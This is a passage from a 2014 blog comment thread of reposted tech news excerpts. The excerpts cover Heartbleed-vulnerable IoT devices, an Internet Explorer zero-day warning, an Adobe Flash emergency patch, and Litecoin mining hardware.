But My Cloud has a problem that belies this ad campaign. It’s a big problem, and it involves Heartbleed
But the My Cloud is just one example of an enormous problem that continues to lurk across the net: tens of thousands of devices — including not only My Cloud storage devices but routers, printers storage servers, firewalls, video cameras, and more — remain vulnerable to attack.
In other words, the Internet of Things needs a patch. “It really is disturbing, the number of devices that are affected by this,” Weaver says.
On Thursday, researchers at the University of Michigan began a massive internet scan to find how widespread the problem really is. The number of devices still at risk is harrowing: HP printers, Polycom video conferencing systems, WatchGuard firewalls, VMWare systems, and Synology storage servers. Weaver counts tens of thousands of users of the Parallels Plesk Panel web hosting control panel that are vulnerable too — those could become a prime target of hackers looking to take control of websites.
Although many vulnerable devices such as printers are tucked safe behind corporate firewalls, Nicholas Weaver found vulnerable printers accessible over the internet, including some built by HP. But even three weeks after Heartbleed was first disclosed, HP can’t even say which of its printers have the bug.
But things could have been much worse. Anything that needs to connect securely over the internet could have a Heartbleed problem. But Weaver and the University of Michigan team found that many devices that used OpenSSL were not vulnerable — either because they used an old version of the software library, or because the buggy OpenSSL feature that contains the flaw wasn’t enabled.
Tomi Engdahl says:
Control Engineering 2014 Cyber Security Study
http://www.controleng.com/single-article/control-engineering-2014-cyber-security-study/992cf83959f0b11837250236e375da48.html
Cyber threats to control systems are high, frequencies of vulnerability assessments are low, and many organizations are lacking a capable cyber incident response team. Are your systems at risk?
Tomi Engdahl says:
It’s spade sellers who REALLY make a killing in a gold rush: It’s OVER for graphics card mining
New Litecoin hardware means alt miners will ditch their packs
http://www.theregister.co.uk/2014/04/29/litecoin_hardware_spells_the_end_for_graphics_card_mining/
If you’ve been mining “low-price Bitcoin wannabe” Litecoins with a rig of graphics cards, now is the time to shuffle them off to eBay – unless you can find a better use for them.
Chinese chip manufacturer Innosilicon is now selling its “A2 Terminator”, a 28nm ASIC for mining Litecoins. It follows on the heels of its A1 offering, a Bitcoin ASIC.
The A2 is capable of 1.8 mega hashes per second (MH/s) at only 13W power consumption
Chips and miners are now being sold with chips at $199 each and miners at $12k but this is aimed at resellers who will order at least 20 miners at a time.
Innosilicon has beaten rival ASIC-pusher KnC Miner to be the first to ship a Litecoin chip
While people keep Bitcoins, they seem more likely to trade Litecoins – which makes the market even more unstable.
Tomi Engdahl says:
Yelp now lists businesses that accept Bitcoin
http://www.cnet.com/news/yelp-now-lists-businesses-that-accept-bitcoin/
Shoppers can check into the reviews site to see whether restaurants, shops, museums, and other establishments accept digital currency payments.
Tomi Engdahl says:
Stop using Microsoft’s IE browser until bug is fixed, US and UK warn
April 28, 2014
http://www.cnet.com/news/stop-using-ie-until-bug-is-fixed-says-us/
In a rare move that highlights the severity of the security hole in one of the Web’s most popular browsers, the US Computer Emergency Readiness Team and its British counterpart tell people to stop using Internet Explorer until Microsoft can fix it.
It’s not often that the US or UK governments weigh in on the browser wars, but a new Internet Explorer vulnerability that affects all major versions of the browser from the past decade has forced it to raise an alarm: Stop using IE.
The zero-day exploit, the term given to a previously unknown, unpatched flaw, allows attackers to install malware on your computer without your permission. That malware could be used to steal personal data, track online behavior, or gain control of the computer.
Tomi Engdahl says:
Adobe Update Nixes Flash Player Zero Day
http://krebsonsecurity.com/2014/04/adobe-update-nixes-flash-player-zero-day/
Adobe Systems Inc. has shipped an emergency security update to fix a critical flaw in its Flash Player software that is currently being exploited in active attacks. The exploits so far appear to target Microsoft Windows users, but updates also are available for Mac and Linux versions of Flash.
brokenflash-aThe Flash update brings the media player to v. 13.0.0.206 on Windows and Mac systems, and v. 11.2.202.356 for Linux users.
To see which version of Flash you have installed, check this link.
https://www.adobe.com/software/flash/about/